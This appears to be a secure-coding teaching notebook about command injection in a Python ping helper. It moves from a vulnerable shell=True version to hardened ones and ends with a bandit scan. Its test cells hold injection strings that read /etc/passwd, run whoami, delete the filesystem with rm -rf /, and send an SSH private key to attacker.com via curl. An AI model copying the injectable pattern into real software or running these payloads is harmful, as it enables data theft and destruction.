<a href="https://colab.research.google.com/github/tsoetan/tsoetan/blob/main/Copy_of_AI_Trust_Paradox.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [ ]:
!pip install bandit

In [ ]:
import subprocess
def check_server(ip_address):
    """
    Pings a server to verify connectivity.
    Used by helpdesk to triage network tickets.
    """
    print(f"[*] Testing connectivity to: {ip_address}")

    # Execute ping command
    command = f"ping -c 1 {ip_address}"

    try:
        output = subprocess.check_output(command, shell=True, text=True)
        return "✓ Server is UP"
    except subprocess.CalledProcessError:
        return "✗ Server is DOWN"
    except Exception as e:
        return f"⚠ Error occurred: {e}"
# Test Cases
print("=== Normal Operations ===")
print(check_server("8.8.8.8"))
print(check_server("192.168.1.1"))
print("\n=== Edge Cases (What's causing crashes?) ===")
# These are causing issues
print(check_server("999.999.999.999"))  # Invalid IP
print(check_server("server.local"))      # Hostname instead of IP


In [ ]:
import subprocess
import platform
import ipaddress
import socket
import re

def check_server(target: str) -> str:
    """
    Safely pings a server to verify connectivity.
    Handles IP addresses and hostnames cross-platform.
    """
    print(f"[*] Testing connectivity to: {target}")

    # 1. VALIDATION: Check for empty strings or dangerous characters
    if not target or not isinstance(target, str):
        return "⚠ Invalid Input: Target cannot be empty."

    # Basic sanitization to allow IPs and Hostnames (alphanumeric, dots, dashes)
    # This adds a layer of safety before the command execution
    if not re.match(r"^[a-zA-Z0-9.-]+$", target):
         return "⚠ Invalid Input: Contains illegal characters."

    # 2. OS COMPATIBILITY: Determine ping parameters
    # Windows uses -n, Linux/Mac uses -c
    param = '-n' if platform.system().lower() == 'windows' else '-c'

    # Build command as a list (NOT a string) to prevent Command Injection
    command = ['ping', param, '1', target]

    try:
        # 3. EXECUTION: Run with timeout and capture output
        # capturing stdout/stderr allows us to suppress the messy system output
        subprocess.run(
            command,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            text=True,
            check=True,   # Raises CalledProcessError if return code != 0
            timeout=5.0   # Stops execution if server is unresponsive
        )
        return "✓ Server is UP"

    except subprocess.TimeoutExpired:
        return "✗ Server is DOWN (Request Timed Out)"

    except subprocess.CalledProcessError:
        # The command ran but returned an error code (Host Unreachable, etc.)
        return "✗ Server is DOWN (Unreachable)"

    except Exception as e:
        # Catch-all for other system errors (e.g., ping command not found)
        return f"⚠ System Error: {str(e)}"

# --- Test Cases ---
if __name__ == "__main__":
    print("=== Normal Operations ===")
    print(check_server("8.8.8.8"))        # Google DNS

    print("\n=== Edge Cases (Fixed) ===")
    print(check_server("999.999.999.999")) # Invalid IP (Will fail ping gracefully)
    print(check_server("server.local"))    # Hostname (Will attempt resolve)
    print(check_server("192.168.1.1; rm -rf /")) # Injection Attack (Now blocked)
    print(check_server(""))                # Empty input

In [ ]:

def check_server(ip_address):
    """
    Improved version with better error handling
    """
    print(f"[*] Testing connectivity to: {ip_address}")

    # Input validation
    if not ip_address or ip_address.strip() == "":
        return "⚠ Error: IP address cannot be empty"

    command = f"ping -c 1 {ip_address.strip()}"

    try:
        output = subprocess.check_output(
            command,
            shell=True,  # <-- STILL HERE
            text=True,
            timeout=5
        )
        return "✓ Server is UP"
    except subprocess.TimeoutExpired:
        return "⚠ Timeout: Server not responding"
    except subprocess.CalledProcessError:
        return "✗ Server is DOWN"
    except Exception as e:
        return f"⚠ Unexpected error: {str(e)}

In [ ]:
import subprocess
import platform
import ipaddress
import socket
import re

def check_server(target: str) -> str:
    """
    Safely pings a server to verify connectivity.
    Handles IP addresses and hostnames cross-platform.
    """
    print(f"[*] Testing connectivity to: {target}")

    # 1. VALIDATION: Check for empty strings or dangerous characters
    if not target or not isinstance(target, str):
        return "⚠ Invalid Input: Target cannot be empty."

    # Basic sanitization to allow IPs and Hostnames (alphanumeric, dots, dashes)
    # This adds a layer of safety before the command execution
    if not re.match(r"^[a-zA-Z0-9.-]+$", target):
         return "⚠ Invalid Input: Contains illegal characters."

    # 2. OS COMPATIBILITY: Determine ping parameters
    # Windows uses -n, Linux/Mac uses -c
    param = '-n' if platform.system().lower() == 'windows' else '-c'

    # Build command as a list (NOT a string) to prevent Command Injection
    command = ['ping', param, '1', target]

    try:
        # 3. EXECUTION: Run with timeout and capture output
        # capturing stdout/stderr allows us to suppress the messy system output
        subprocess.run(
            command,
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            text=True,
            check=True,   # Raises CalledProcessError if return code != 0
            timeout=5.0   # Stops execution if server is unresponsive
        )
        return "✓ Server is UP"

    except subprocess.TimeoutExpired:
        return "✗ Server is DOWN (Request Timed Out)"

    except subprocess.CalledProcessError:
        # The command ran but returned an error code (Host Unreachable, etc.)
        return "✗ Server is DOWN (Unreachable)"

    except Exception as e:
        # Catch-all for other system errors (e.g., ping command not found)
        return f"⚠ System Error: {str(e)}"

# --- Test Cases ---
if __name__ == "__main__":
    print("=== Normal Operations ===")
    print(check_server("8.8.8.8"))        # Google DNS

    print("\n=== Edge Cases (Fixed) ===")
    print(check_server("999.999.999.999")) # Invalid IP (Will fail ping gracefully)
    print(check_server("server.local"))    # Hostname (Will attempt resolve)
    print(check_server("192.168.1.1; rm -rf /")) # Injection Attack (Now blocked)
    print(check_server(""))                # Empty input

In [ ]:
# MALICIOUS INPUT EXAMPLES
print("\n=== Security Audit ===")
# Test 1: Command Injection via semicolon
malicious_ip_1 = "8.8.8.8; cat /etc/passwd"
print(check_server(malicious_ip_1))
# Test 2: Command chaining with AND
malicious_ip_2 = "8.8.8.8 && whoami"
print(check_server(malicious_ip_2))
# Test 3: Command chaining with pipe
malicious_ip_3 = "8.8.8.8 | ls -la"
print(check_server(malicious_ip_3))
# Test 4: Exfiltration attempt
malicious_ip_4 = "8.8.8.8; curl http://attacker.com/steal?data=$(cat ~/.ssh/id_rsa)"
print(check_server(malicious_ip_4))


In [ ]:
import subprocess
import ipaddress
def check_server(ip_address):
    """
    Securely checks server connectivity.

    SECURITY CONTROLS:
    - Input validation using ipaddress module
    - Command passed as list (prevents injection)
    - Timeout to prevent hanging
    - No shell=True (prevents shell interpretation)
    """
    print(f"[*] Testing connectivity to: {ip_address}")

    # CONTROL 1: Validate input format
    try:
        ip_address = ip_address.strip()
        # Will raise ValueError if not valid IP
        ipaddress.ip_address(ip_address)
    except ValueError:
        return f"⚠ Invalid IP address format: '{ip_address}'"

    # CONTROL 2: Use argument list (not shell string)
    try:
        result = subprocess.run(
            ["ping", "-c", "1", "-W", "2", ip_address],  # List format!
            capture_output=True,
            text=True,
            timeout=5
        )

        if result.returncode == 0:
            return "✓ Server is UP"
        else:
            return "✗ Server is DOWN"

    except subprocess.TimeoutExpired:
        return f"⚠ Timeout: {ip_address} not responding"
    except FileNotFoundError:
        return "⚠ Error: 'ping' command not available"
    except Exception as e:
        return f"⚠ Unexpected error: {str(e)}"

In [ ]:
print("=== Normal Operations ===")
print(check_server("8.8.8.8"))          # IPv4
print(check_server("2001:4860:4860::8888")) # IPv6

print("\n=== Edge Cases (Fixed) ===")
# These previously caused crashes or issues
print(check_server("999.999.999.999"))  # Invalid IP -> Caught by validator
print(check_server("server.local"))     # Hostname -> Caught by validator
print(check_server("8.8.8.8; rm -rf /")) # Injection -> Caught by validator

In [ ]:
!pip install bandit
# Save your vulnerable code to a file
with open('vulnerable.py', 'w') as f:
    f.write('''
import subprocess
def check_server(ip):
    command = f"ping -c 1 {ip}"
    output = subprocess.check_output(command, shell=True, text=True)
    return output
''')
# Run static analysis
!bandit -r vulnerable.py
